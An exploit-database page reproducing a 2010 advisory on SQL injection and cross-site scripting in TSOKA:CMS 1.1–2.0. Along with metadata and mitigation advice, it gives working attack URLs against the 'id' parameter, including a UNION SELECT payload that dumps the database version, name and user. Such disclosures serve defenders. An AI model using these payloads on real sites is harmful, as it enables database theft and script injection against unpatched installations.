header-logo
Suggest Exploit
vendor:
TSOKA:CMS
by:
d3v1l [Avram Marius]
8,8
CVSS
HIGH
SQL Injection & XSS
89, 79
CWE
Product Name: TSOKA:CMS
Affected Version From: 1.1
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:tsoka:tsoka:cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability

TSOKA:CMS versions 1.1, 1.9 and 2.0 are vulnerable to SQL Injection and XSS attacks. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database and inject malicious JavaScript code into the application.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should ensure that all output is properly encoded before being returned to the user.
Source

Exploit-DB raw data:

[~]-----------------------------------------------------------------------------------------------------------------------
[~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability
[~]
[~] http://www.alanzard.com (from italy)
[~]
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 28.03.2010
[~]
[~]
[~] http://security-sh3ll.blogspot.com
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] articolo&id= SQL & XSS
[~]
[~]
[~] Ex -
[~]
[~] http://[site]/?pag=articolo&id=">
[~] http://[site]/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
[~]------------------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR